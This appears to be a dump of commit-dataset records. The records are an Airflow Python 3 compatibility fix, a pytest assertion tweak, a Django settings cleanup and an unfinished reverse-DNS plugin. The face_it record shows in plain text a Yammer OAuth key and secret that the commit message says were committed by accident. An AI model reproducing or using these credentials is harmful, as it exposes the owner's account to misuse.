n/incubator-airflow,btallman/incubator-airflow,lxneng/incubator-airflow,r39132/airflow,jesusfcr/airflow,malmiron/incubator-airflow,ty707/airflow,cfei18/incubator-airflow,mrkm4ntr/incubator-airflow,criccomini/airflow,MetrodataTeam/incubator-airflow,caseyching/incubator-airflow,gilt/incubator-airflow,apache/incubator-airflow,kerzhner/airflow,asnir/airflow,DinoCow/airflow,MetrodataTeam/incubator-airflow,cjqian/incubator-airflow,juvoinc/airflow,jbhsieh/incubator-airflow,spektom/incubator-airflow,kerzhner/airflow,cfei18/incubator-airflow,lxneng/incubator-airflow,saguziel/incubator-airflow,lyft/incubator-airflow,yiqingj/airflow,gritlogic/incubator-airflow,aminghadersohi/airflow,yk5/incubator-airflow,cademarkegard/airflow,mtdewulf/incubator-airflow,ledsusop/airflow,subodhchhabra/airflow,mattuuh7/incubator-airflow,r39132/airflow,KL-WLCR/incubator-airflow,wooga/airflow,DEVELByte/incubator-airflow,jlowin/airflow,easytaxibr/airflow,zack3241/incubator-airflow,wileeam/airflow,RealImpactAnalytics/airflow,jwi078/incubator-airflow,bolkedebruin/airflow,jiwang576/incubator-airflow,MortalViews/incubator-airflow,jesusfcr/airflow,stverhae/incubator-airflow,mrkm4ntr/incubator-airflow,cfei18/incubator-airflow,danielvdende/incubator-airflow,andyxhadji/incubator-airflow,andrewmchen/incubator-airflow,owlabs/incubator-airflow,modsy/incubator-airflow,wooga/airflow,andrewmchen/incubator-airflow,ronfung/incubator-airflow,jiwang576/incubator-airflow,adrpar/incubator-airflow,modsy/incubator-airflow,d-lee/airflow,preete-dixit-ck/incubator-airflow,jgao54/airflow,gritlogic/incubator-airflow,dgies/incubator-airflow,vineet-rh/incubator-airflow,vijaysbhat/incubator-airflow,andrewmchen/incubator-airflow,fenglu-g/incubator-airflow,Acehaidrey/incubator-airflow,sid88in/incubator-airflow,yk5/incubator-airflow,adamhaney/airflow,stverhae/incubator-airflow,apache/airflow,jiwang576/incubator-airflow,fenglu-g/incubator-airflow,Twistbioscience/incubator-airflow,sergiohgz/incubator-airflow,artwr/airflow,N3da/incubator-airflow,airbnb/airflow,dud225/incubator-airflow,mtdewulf/incubator-airflow,CloverHealth/airflow,sid88in/incubator-airflow,ProstoMaxim/incubator-airflow,apache/incubator-airflow,Fokko/incubator-airflow,andrewmchen/incubator-airflow,preete-dixit-ck/incubator-airflow,janczak10/incubator-airflow,owlabs/incubator-airflow,wolfier/incubator-airflow,biln/airflow,danielvdende/incubator-airflow,wileeam/airflow,artwr/airflow,Twistbioscience/incubator-airflow,danielvdende/incubator-airflow,hamedhsn/incubator-airflow,preete-dixit-ck/incubator-airflow,juvoinc/airflow,mtagle/airflow,wndhydrnt/airflow,ledsusop/airflow,skudriashev/incubator-airflow,dud225/incubator-airflow,rishibarve/incubator-airflow,forevernull/incubator-airflow,plypaul/airflow,dhuang/incubator-airflow,kerzhner/airflow,wxiang7/airflow,akosel/incubator-airflow,jiwang576/incubator-airflow,sekikn/incubator-airflow,wndhydrnt/airflow,Fokko/incubator-airflow,CloverHealth/airflow,cfei18/incubator-airflow,MetrodataTeam/incubator-airflow,Acehaidrey/incubator-airflow,MortalViews/incubator-airflow,DEVELByte/incubator-airflow,mistercrunch/airflow,jfantom/incubator-airflow,gtoonstra/airflow,criccomini/airflow,DEVELByte/incubator-airflow,subodhchhabra/airflow,zodiac/incubator-airflow,zoyahav/incubator-airflow,cfei18/incubator-airflow,jhsenjaliya/incubator-airflow,yati-sagade/incubator-airflow,subodhchhabra/airflow,jlowin/airflow,dhuang/incubator-airflow,dud225/incubator-airflow,wxiang7/airflow,jfantom/incubator-airflow,skudriashev/incubator-airflow,andyxhadji/incubator-airflow,danielvdende/incubator-airflow,wolfier/incubator-airflow,Fokko/incubator-airflow,CloverHealth/airflow,juvoinc/airflow,modsy/incubator-airflow,mtdewulf/incubator-airflow,btallman/incubator-airflow,d-lee/airflow,zack3241/incubator-airflow,jlowin/airflow,apache/airflow,alexvanboxel/airflow,jbhsieh/incubator-airflow,btallman/incubator-airflow,nathanielvarona/airflow,lyft/incubator-airflow,apache/airflow,mrares/incubator-airflow,hgrif/incubator-airflow,AllisonWang/incubator-airflow,sdiazb/airflow,mistercrunch/airflow,malmiron/incubator-airflow,stverhae/incubator-airflow,zack3241/incubator-airflow,jhsenjaliya/incubator-airflow,d-lee/airflow,yk5/incubator-airflow,vineet-rh/incubator-airflow,sekikn/incubator-airflow,Tagar/incubator-airflow,Tagar/incubator-airflow,easytaxibr/airflow,AllisonWang/incubator-airflow,airbnb/airflow,mtagle/airflow,gilt/incubator-airflow,hamedhsn/incubator-airflow,zoyahav/incubator-airflow,danielvdende/incubator-airflow,zodiac/incubator-airflow,edgarRd/incubator-airflow,sekikn/incubator-airflow,Tagar/incubator-airflow,andyxhadji/incubator-airflow,Twistbioscience/incubator-airflow,akosel/incubator-airflow,caseyching/incubator-airflow,airbnb/airflow,brandsoulmates/incubator-airflow,KL-WLCR/incubator-airflow,MortalViews/incubator-airflow,preete-dixit-ck/incubator-airflow,spektom/incubator-airflow,vineet-rh/incubator-airflow,yiqingj/airflow,wileeam/airflow,yati-sagade/incubator-airflow,mistercrunch/airflow,Acehaidrey/incubator-airflow,wolfier/incubator-airflow,plypaul/airflow,holygits/incubator-airflow,vijaysbhat/incubator-airflow,alexvanboxel/airflow,adrpar/incubator-airflow,RealImpactAnalytics/airflow,spektom/incubator-airflow,caseyching/incubator-airflow,adamhaney/airflow,wxiang7/airflow,DinoCow/airflow,adrpar/incubator-airflow,jgao54/airflow,wolfier/incubator-airflow,alexvanboxel/airflow,ronfung/incubator-airflow,dmitry-r/incubator-airflow,mrkm4ntr/incubator-airflow,nathanielvarona/airflow,OpringaoDoTurno/airflow,zack3241/incubator-airflow,skudriashev/incubator-airflow,biln/airflow,apache/airflow,plypaul/airflow,janczak10/incubator-airflow,mylons/incubator-airflow,DEVELByte/incubator-airflow,jfantom/incubator-airflow,janczak10/incubator-airflow,jfantom/incubator-airflow,modsy/incubator-airflow,brandsoulmates/incubator-airflow,ProstoMaxim/incubator-airflow,ProstoMaxim/incubator-airflow,jwi078/incubator-airflow,akosel/incubator-airflow,N3da/incubator-airflow,sdiazb/airflow,mattuuh7/incubator-airflow,mrares/incubator-airflow,nathanielvarona/airflow,apache/airflow,holygits/incubator-airflow,OpringaoDoTurno/airflow,sergiohgz/incubator-airflow,bolkedebruin/airflow,N3da/incubator-airflow,criccomini/airflow,hgrif/incubator-airflow,gtoonstra/airflow,edgarRd/incubator-airflow,NielsZeilemaker/incubator-airflow,jbhsieh/incubator-airflow,cademarkegard/airflow,skudriashev/incubator-airflow,subodhchhabra/airflow,yk5/incubator-airflow,RealImpactAnalytics/airflow,ProstoMaxim/incubator-airflow,ty707/airflow,edgarRd/incubator-airflow,bolkedebruin/airflow,saguziel/incubator-airflow,hgrif/incubator-airflow,brandsoulmates/incubator-airflow,holygits/incubator-airflow,forevernull/incubator-airflow,biln/airflow,mattuuh7/incubator-airflow,cfei18/incubator-airflow,wileeam/airflow,rishibarve/incubator-airflow,sid88in/incubator-airflow,dhuang/incubator-airflow,OpringaoDoTurno/airflow,KL-WLCR/incubator-airflow,jbhsieh/incubator-airflow,ronfung/incubator-airflow,wxiang7/airflow,ty707/airflow,asnir/airflow,forevernull/incubator-airflow,lyft/incubator-airflow,gtoonstra/airflow,DinoCow/airflow,sekikn/incubator-airflow,plypaul/airflow,dmitry-r/incubator-airflow,lxneng/incubator-airflow,zoyahav/incubator-airflow,aminghadersohi/airflow,owlabs/incubator-airflow,MortalViews/incubator-airflow,juvoinc/airflow,mylons/incubator-airflow,Tagar/incubator-airflow,vineet-rh/incubator-airflow,saguziel/incubator-airflow,KL-WLCR/incubator-airflow,spektom/incubator-airflow,caseyching/incubator-airflow,d-lee/airflow,bolkedebruin/airflow,adrpar/incubator-airflow,Acehaidrey/incubator-airflow,malmiron/incubator-airflow,mylons/incubator-airflow,RealImpactAnalytics/airflow,NielsZeilemaker/incubator-airflow,akosel/incubator-airflow,wooga/airflow,nathanielvarona/airflow,jhsenjaliya/incubator-airflow,holygits/incubator-airflow,jgao54/airflow,asnir/airflow,dud225/incubator-airflow,nathanielvarona/airflow,cademarkegard/airflow,stverhae/incubator-airflow,cademarkegard/airflow,jgao54/airflow,ledsusop/airflow,aminghadersohi/airflow,bolkedebruin/airflow,AllisonWang/incubator-airflow,fenglu-g/incubator-airflow,btallman/incubator-airflow,yiqingj/airflow,artwr/airflow,Twistbioscience/incubator-airflow,danielvdende/incubator-airflow,mtagle/airflow,MetrodataTeam/incubator-airflow,yiqingj/airflow,criccomini/airflow,lyft/incubator-airflow,apache/incubator-airflow,jwi078/incubator-airflow,adamhaney/airflow,fenglu-g/incubator-airflow,easytaxibr/airflow,artwr/airflow,vijaysbhat/incubator-airflow,zodiac/incubator-airflow,ty707/airflow,dgies/incubator-airflow,forevernull/incubator-airflow,mistercrunch/airflow,adamhaney/airflow,zodiac/incubator-airflow,gtoonstra/airflow,lxneng/incubator-airflow,cjqian/incubator-airflow,sergiohgz/incubator-airflow,apache/incubator-airflow,dhuang/incubator-airflow,dgies/incubator-airflow,Acehaidrey/incubator-airflow
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import warnings
from .decorators import apply_defaults as _apply_defaults
def apply_defaults(func):
warnings.warn_explicit(
"""
You are importing apply_defaults from airflow.utils which
will be deprecated in a future version.
Please use :
from airflow.utils.decorators import apply_defaults
""",
category=PendingDeprecationWarning,
filename=func.func_code.co_filename,
lineno=func.func_code.co_firstlineno + 1
)
return _apply_defaults(func)
Fix airflow.utils deprecation warning code being Python 3 incompatible
See https://docs.python.org/3.0/whatsnew/3.0.html#operators-and-special-methods
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import warnings
from .decorators import apply_defaults as _apply_defaults
def apply_defaults(func):
warnings.warn_explicit(
"""
You are importing apply_defaults from airflow.utils which
will be deprecated in a future version.
Please use :
from airflow.utils.decorators import apply_defaults
""",
category=PendingDeprecationWarning,
filename=func.__code__.co_filename,
lineno=func.__code__.co_firstlineno + 1
)
return _apply_defaults(func)
|
<commit_before># -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import warnings
from .decorators import apply_defaults as _apply_defaults
def apply_defaults(func):
warnings.warn_explicit(
"""
You are importing apply_defaults from airflow.utils which
will be deprecated in a future version.
Please use :
from airflow.utils.decorators import apply_defaults
""",
category=PendingDeprecationWarning,
filename=func.func_code.co_filename,
lineno=func.func_code.co_firstlineno + 1
)
return _apply_defaults(func)
<commit_msg>Fix airflow.utils deprecation warning code being Python 3 incompatible
See https://docs.python.org/3.0/whatsnew/3.0.html#operators-and-special-methods<commit_after>
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import warnings
from .decorators import apply_defaults as _apply_defaults
def apply_defaults(func):
warnings.warn_explicit(
"""
You are importing apply_defaults from airflow.utils which
will be deprecated in a future version.
Please use :
from airflow.utils.decorators import apply_defaults
""",
category=PendingDeprecationWarning,
filename=func.__code__.co_filename,
lineno=func.__code__.co_firstlineno + 1
)
return _apply_defaults(func)
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import warnings
from .decorators import apply_defaults as _apply_defaults
def apply_defaults(func):
warnings.warn_explicit(
"""
You are importing apply_defaults from airflow.utils which
will be deprecated in a future version.
Please use :
from airflow.utils.decorators import apply_defaults
""",
category=PendingDeprecationWarning,
filename=func.func_code.co_filename,
lineno=func.func_code.co_firstlineno + 1
)
return _apply_defaults(func)
Fix airflow.utils deprecation warning code being Python 3 incompatible
See https://docs.python.org/3.0/whatsnew/3.0.html#operators-and-special-methods# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import warnings
from .decorators import apply_defaults as _apply_defaults
def apply_defaults(func):
warnings.warn_explicit(
"""
You are importing apply_defaults from airflow.utils which
will be deprecated in a future version.
Please use :
from airflow.utils.decorators import apply_defaults
""",
category=PendingDeprecationWarning,
filename=func.__code__.co_filename,
lineno=func.__code__.co_firstlineno + 1
)
return _apply_defaults(func)
|
<commit_before># -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import warnings
from .decorators import apply_defaults as _apply_defaults
def apply_defaults(func):
warnings.warn_explicit(
"""
You are importing apply_defaults from airflow.utils which
will be deprecated in a future version.
Please use :
from airflow.utils.decorators import apply_defaults
""",
category=PendingDeprecationWarning,
filename=func.func_code.co_filename,
lineno=func.func_code.co_firstlineno + 1
)
return _apply_defaults(func)
<commit_msg>Fix airflow.utils deprecation warning code being Python 3 incompatible
See https://docs.python.org/3.0/whatsnew/3.0.html#operators-and-special-methods<commit_after># -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import warnings
from .decorators import apply_defaults as _apply_defaults
def apply_defaults(func):
warnings.warn_explicit(
"""
You are importing apply_defaults from airflow.utils which
will be deprecated in a future version.
Please use :
from airflow.utils.decorators import apply_defaults
""",
category=PendingDeprecationWarning,
filename=func.__code__.co_filename,
lineno=func.__code__.co_firstlineno + 1
)
return _apply_defaults(func)
|
b0b57fd69378c3ed6ee35abd0c45c952a1c52dd1
|
planet_alignment/test/config/bunch_parser.py
|
planet_alignment/test/config/bunch_parser.py
|
"""
.. module:: config_parser
:platform: linux
:synopsis: Module to test the bunch YAML configuration parser.
.. moduleauthor:: Paul Fanelli <paul.fanelli@gmail.com>
.. modulecreated:: 6/26/15
"""
from bunch import Bunch
import pytest
from planet_alignment.config.bunch_parser import BunchParser
from planet_alignment.test import constants
@pytest.fixture(scope='module')
def fix_parser():
return BunchParser()
def test_parse_nonexistent_file(fix_parser, capsys):
with pytest.raises(SystemExit):
fix_parser.parse('nonexistent')
out, err = capsys.readouterr()
assert "ERROR: No configuration file" in str(out)
def test_parse_bad_file(fix_parser, capsys):
config_file = constants.TEST_BAD_CONFIG_FILE
with pytest.raises(SystemExit):
fix_parser.parse(config_file)
out, err = capsys.readouterr()
assert "ERROR: Error parsing the configuration file" in str(out)
def test_parse_config_file(fix_parser):
config_file = constants.TEST_SYSTEM_YAML
b = fix_parser.parse(config_file)
assert isinstance(b, Bunch) is True
|
"""
.. module:: config_parser
:platform: linux
:synopsis: Module to test the bunch YAML configuration parser.
.. moduleauthor:: Paul Fanelli <paul.fanelli@gmail.com>
.. modulecreated:: 6/26/15
"""
from bunch import Bunch
import pytest
from planet_alignment.config.bunch_parser import BunchParser
from planet_alignment.test import constants
@pytest.fixture(scope='module')
def fix_parser():
return BunchParser()
def test_parse_nonexistent_file(fix_parser, capsys):
with pytest.raises(SystemExit):
fix_parser.parse('nonexistent')
out, err = capsys.readouterr()
assert "ERROR: No configuration file" in str(out)
def test_parse_bad_file(fix_parser, capsys):
config_file = constants.TEST_BAD_CONFIG_FILE
with pytest.raises(SystemExit):
fix_parser.parse(config_file)
out, err = capsys.readouterr()
assert "ERROR: Error parsing the configuration file" in str(out)
def test_parse_config_file(fix_parser):
config_file = constants.TEST_SYSTEM_YAML
b = fix_parser.parse(config_file)
assert isinstance(b, Bunch)
|
Remove superfluous 'is True' from the assert.
|
Remove superfluous 'is True' from the assert.
|
Python
|
mit
|
paulfanelli/planet_alignment
|
"""
.. module:: config_parser
:platform: linux
:synopsis: Module to test the bunch YAML configuration parser.
.. moduleauthor:: Paul Fanelli <paul.fanelli@gmail.com>
.. modulecreated:: 6/26/15
"""
from bunch import Bunch
import pytest
from planet_alignment.config.bunch_parser import BunchParser
from planet_alignment.test import constants
@pytest.fixture(scope='module')
def fix_parser():
return BunchParser()
def test_parse_nonexistent_file(fix_parser, capsys):
with pytest.raises(SystemExit):
fix_parser.parse('nonexistent')
out, err = capsys.readouterr()
assert "ERROR: No configuration file" in str(out)
def test_parse_bad_file(fix_parser, capsys):
config_file = constants.TEST_BAD_CONFIG_FILE
with pytest.raises(SystemExit):
fix_parser.parse(config_file)
out, err = capsys.readouterr()
assert "ERROR: Error parsing the configuration file" in str(out)
def test_parse_config_file(fix_parser):
config_file = constants.TEST_SYSTEM_YAML
b = fix_parser.parse(config_file)
assert isinstance(b, Bunch) is True
Remove superfluous 'is True' from the assert.
|
"""
.. module:: config_parser
:platform: linux
:synopsis: Module to test the bunch YAML configuration parser.
.. moduleauthor:: Paul Fanelli <paul.fanelli@gmail.com>
.. modulecreated:: 6/26/15
"""
from bunch import Bunch
import pytest
from planet_alignment.config.bunch_parser import BunchParser
from planet_alignment.test import constants
@pytest.fixture(scope='module')
def fix_parser():
return BunchParser()
def test_parse_nonexistent_file(fix_parser, capsys):
with pytest.raises(SystemExit):
fix_parser.parse('nonexistent')
out, err = capsys.readouterr()
assert "ERROR: No configuration file" in str(out)
def test_parse_bad_file(fix_parser, capsys):
config_file = constants.TEST_BAD_CONFIG_FILE
with pytest.raises(SystemExit):
fix_parser.parse(config_file)
out, err = capsys.readouterr()
assert "ERROR: Error parsing the configuration file" in str(out)
def test_parse_config_file(fix_parser):
config_file = constants.TEST_SYSTEM_YAML
b = fix_parser.parse(config_file)
assert isinstance(b, Bunch)
|
<commit_before>"""
.. module:: config_parser
:platform: linux
:synopsis: Module to test the bunch YAML configuration parser.
.. moduleauthor:: Paul Fanelli <paul.fanelli@gmail.com>
.. modulecreated:: 6/26/15
"""
from bunch import Bunch
import pytest
from planet_alignment.config.bunch_parser import BunchParser
from planet_alignment.test import constants
@pytest.fixture(scope='module')
def fix_parser():
return BunchParser()
def test_parse_nonexistent_file(fix_parser, capsys):
with pytest.raises(SystemExit):
fix_parser.parse('nonexistent')
out, err = capsys.readouterr()
assert "ERROR: No configuration file" in str(out)
def test_parse_bad_file(fix_parser, capsys):
config_file = constants.TEST_BAD_CONFIG_FILE
with pytest.raises(SystemExit):
fix_parser.parse(config_file)
out, err = capsys.readouterr()
assert "ERROR: Error parsing the configuration file" in str(out)
def test_parse_config_file(fix_parser):
config_file = constants.TEST_SYSTEM_YAML
b = fix_parser.parse(config_file)
assert isinstance(b, Bunch) is True
<commit_msg>Remove superfluous 'is True' from the assert.<commit_after>
|
"""
.. module:: config_parser
:platform: linux
:synopsis: Module to test the bunch YAML configuration parser.
.. moduleauthor:: Paul Fanelli <paul.fanelli@gmail.com>
.. modulecreated:: 6/26/15
"""
from bunch import Bunch
import pytest
from planet_alignment.config.bunch_parser import BunchParser
from planet_alignment.test import constants
@pytest.fixture(scope='module')
def fix_parser():
return BunchParser()
def test_parse_nonexistent_file(fix_parser, capsys):
with pytest.raises(SystemExit):
fix_parser.parse('nonexistent')
out, err = capsys.readouterr()
assert "ERROR: No configuration file" in str(out)
def test_parse_bad_file(fix_parser, capsys):
config_file = constants.TEST_BAD_CONFIG_FILE
with pytest.raises(SystemExit):
fix_parser.parse(config_file)
out, err = capsys.readouterr()
assert "ERROR: Error parsing the configuration file" in str(out)
def test_parse_config_file(fix_parser):
config_file = constants.TEST_SYSTEM_YAML
b = fix_parser.parse(config_file)
assert isinstance(b, Bunch)
|
"""
.. module:: config_parser
:platform: linux
:synopsis: Module to test the bunch YAML configuration parser.
.. moduleauthor:: Paul Fanelli <paul.fanelli@gmail.com>
.. modulecreated:: 6/26/15
"""
from bunch import Bunch
import pytest
from planet_alignment.config.bunch_parser import BunchParser
from planet_alignment.test import constants
@pytest.fixture(scope='module')
def fix_parser():
return BunchParser()
def test_parse_nonexistent_file(fix_parser, capsys):
with pytest.raises(SystemExit):
fix_parser.parse('nonexistent')
out, err = capsys.readouterr()
assert "ERROR: No configuration file" in str(out)
def test_parse_bad_file(fix_parser, capsys):
config_file = constants.TEST_BAD_CONFIG_FILE
with pytest.raises(SystemExit):
fix_parser.parse(config_file)
out, err = capsys.readouterr()
assert "ERROR: Error parsing the configuration file" in str(out)
def test_parse_config_file(fix_parser):
config_file = constants.TEST_SYSTEM_YAML
b = fix_parser.parse(config_file)
assert isinstance(b, Bunch) is True
Remove superfluous 'is True' from the assert."""
.. module:: config_parser
:platform: linux
:synopsis: Module to test the bunch YAML configuration parser.
.. moduleauthor:: Paul Fanelli <paul.fanelli@gmail.com>
.. modulecreated:: 6/26/15
"""
from bunch import Bunch
import pytest
from planet_alignment.config.bunch_parser import BunchParser
from planet_alignment.test import constants
@pytest.fixture(scope='module')
def fix_parser():
return BunchParser()
def test_parse_nonexistent_file(fix_parser, capsys):
with pytest.raises(SystemExit):
fix_parser.parse('nonexistent')
out, err = capsys.readouterr()
assert "ERROR: No configuration file" in str(out)
def test_parse_bad_file(fix_parser, capsys):
config_file = constants.TEST_BAD_CONFIG_FILE
with pytest.raises(SystemExit):
fix_parser.parse(config_file)
out, err = capsys.readouterr()
assert "ERROR: Error parsing the configuration file" in str(out)
def test_parse_config_file(fix_parser):
config_file = constants.TEST_SYSTEM_YAML
b = fix_parser.parse(config_file)
assert isinstance(b, Bunch)
|
<commit_before>"""
.. module:: config_parser
:platform: linux
:synopsis: Module to test the bunch YAML configuration parser.
.. moduleauthor:: Paul Fanelli <paul.fanelli@gmail.com>
.. modulecreated:: 6/26/15
"""
from bunch import Bunch
import pytest
from planet_alignment.config.bunch_parser import BunchParser
from planet_alignment.test import constants
@pytest.fixture(scope='module')
def fix_parser():
return BunchParser()
def test_parse_nonexistent_file(fix_parser, capsys):
with pytest.raises(SystemExit):
fix_parser.parse('nonexistent')
out, err = capsys.readouterr()
assert "ERROR: No configuration file" in str(out)
def test_parse_bad_file(fix_parser, capsys):
config_file = constants.TEST_BAD_CONFIG_FILE
with pytest.raises(SystemExit):
fix_parser.parse(config_file)
out, err = capsys.readouterr()
assert "ERROR: Error parsing the configuration file" in str(out)
def test_parse_config_file(fix_parser):
config_file = constants.TEST_SYSTEM_YAML
b = fix_parser.parse(config_file)
assert isinstance(b, Bunch) is True
<commit_msg>Remove superfluous 'is True' from the assert.<commit_after>"""
.. module:: config_parser
:platform: linux
:synopsis: Module to test the bunch YAML configuration parser.
.. moduleauthor:: Paul Fanelli <paul.fanelli@gmail.com>
.. modulecreated:: 6/26/15
"""
from bunch import Bunch
import pytest
from planet_alignment.config.bunch_parser import BunchParser
from planet_alignment.test import constants
@pytest.fixture(scope='module')
def fix_parser():
return BunchParser()
def test_parse_nonexistent_file(fix_parser, capsys):
with pytest.raises(SystemExit):
fix_parser.parse('nonexistent')
out, err = capsys.readouterr()
assert "ERROR: No configuration file" in str(out)
def test_parse_bad_file(fix_parser, capsys):
config_file = constants.TEST_BAD_CONFIG_FILE
with pytest.raises(SystemExit):
fix_parser.parse(config_file)
out, err = capsys.readouterr()
assert "ERROR: Error parsing the configuration file" in str(out)
def test_parse_config_file(fix_parser):
config_file = constants.TEST_SYSTEM_YAML
b = fix_parser.parse(config_file)
assert isinstance(b, Bunch)
|
fd03c80eb7b705f6f3e9e6c554950ed15a7ecdd4
|
face_it/settings/dev.py
|
face_it/settings/dev.py
|
from .base import *
DEBUG = True
try:
from .local import *
except ImportError:
pass
SOCIAL_AUTH_YAMMER_KEY = 'OCnfR7VJNBbcSS8GXMCi3A'
SOCIAL_AUTH_YAMMER_SECRET = 'y1MZSoo0MuX8RJPEjMbZWJDvafR9mZmFWWUfHOcZgxM'
|
from .base import *
DEBUG = True
try:
from .local import *
except ImportError:
pass
|
Remove yammer api key that was accidentally committed
|
Remove yammer api key that was accidentally committed
|
Python
|
cc0-1.0
|
m3brown/face_it,m3brown/face_it,excellalabs/face-off,m3brown/face_it,kave/Face-Off,m3brown/face_it,madridsoccer5/face-off,excellalabs/face-off,kave/Face-Off,excellalabs/face-off,madridsoccer5/face-off,kave/Face-Off,excellalabs/face-off,kave/Face-Off,madridsoccer5/face-off,madridsoccer5/face-off
|
from .base import *
DEBUG = True
try:
from .local import *
except ImportError:
pass
SOCIAL_AUTH_YAMMER_KEY = 'OCnfR7VJNBbcSS8GXMCi3A'
SOCIAL_AUTH_YAMMER_SECRET = 'y1MZSoo0MuX8RJPEjMbZWJDvafR9mZmFWWUfHOcZgxM'
Remove yammer api key that was accidentally committed
|
from .base import *
DEBUG = True
try:
from .local import *
except ImportError:
pass
|
<commit_before>from .base import *
DEBUG = True
try:
from .local import *
except ImportError:
pass
SOCIAL_AUTH_YAMMER_KEY = 'OCnfR7VJNBbcSS8GXMCi3A'
SOCIAL_AUTH_YAMMER_SECRET = 'y1MZSoo0MuX8RJPEjMbZWJDvafR9mZmFWWUfHOcZgxM'
<commit_msg>Remove yammer api key that was accidentally committed<commit_after>
|
from .base import *
DEBUG = True
try:
from .local import *
except ImportError:
pass
|
from .base import *
DEBUG = True
try:
from .local import *
except ImportError:
pass
SOCIAL_AUTH_YAMMER_KEY = 'OCnfR7VJNBbcSS8GXMCi3A'
SOCIAL_AUTH_YAMMER_SECRET = 'y1MZSoo0MuX8RJPEjMbZWJDvafR9mZmFWWUfHOcZgxM'
Remove yammer api key that was accidentally committedfrom .base import *
DEBUG = True
try:
from .local import *
except ImportError:
pass
|
<commit_before>from .base import *
DEBUG = True
try:
from .local import *
except ImportError:
pass
SOCIAL_AUTH_YAMMER_KEY = 'OCnfR7VJNBbcSS8GXMCi3A'
SOCIAL_AUTH_YAMMER_SECRET = 'y1MZSoo0MuX8RJPEjMbZWJDvafR9mZmFWWUfHOcZgxM'
<commit_msg>Remove yammer api key that was accidentally committed<commit_after>from .base import *
DEBUG = True
try:
from .local import *
except ImportError:
pass
|
8121924b8d056752a31255646b116e9eb6fbbaa6
|
plugins/reversedns.py
|
plugins/reversedns.py
|
import logging, interfaces, os, IPy
from StringIO import StringIO
class Shorewall(interfaces.IOpenMesherPlugin):
def __init__(self):
self._files = {}
def process(self, mesh):
logging.debug('Generating DNS config...')
self._files = {}
rdns = StringIO()
for router in mesh.links:
for link in mesh.links[router]:
if link.isServer(router):
ip1 = IPy.IP(str(link.block[1]))
ip2 = IPy.IP(str(link.block[2]))
#BUG: fqdn might not be populated if just using hostnames.
#BUG: Need to allow reversing to alternate domain names if p2p routing block is private
#BUG: Need to put iface name in rev dns
rdns.write('%s\t\tPTR\t%s.\n' %(ip1.reverseName(), link.server.fqdn))
rdns.write('%s\t\tPTR\t%s.\n' %(ip2.reverseName(), link.client.fqdn))
self._files[router] = {'/etc/mesh-reverse.db': rdns.getvalue()}
return True
def files(self):
""" Return a dictionary of routers containing a dictionary of filenames and contents """
return self._files
|
import logging, interfaces, os, IPy
from StringIO import StringIO
class Shorewall(interfaces.IOpenMesherPlugin):
def __init__(self):
self._files = {}
def process(self, mesh):
logging.debug('Generating DNS config...')
self._files = {}
rdns = StringIO()
for router in mesh.links:
for link in mesh.links[router]:
if link.isServer(router):
ip1 = IPy.IP(str(link.block[1]))
ip2 = IPy.IP(str(link.block[2]))
#BUG: fqdn might not be populated if just using hostnames.
#BUG: Need to allow reversing to alternate domain names if p2p routing block is private
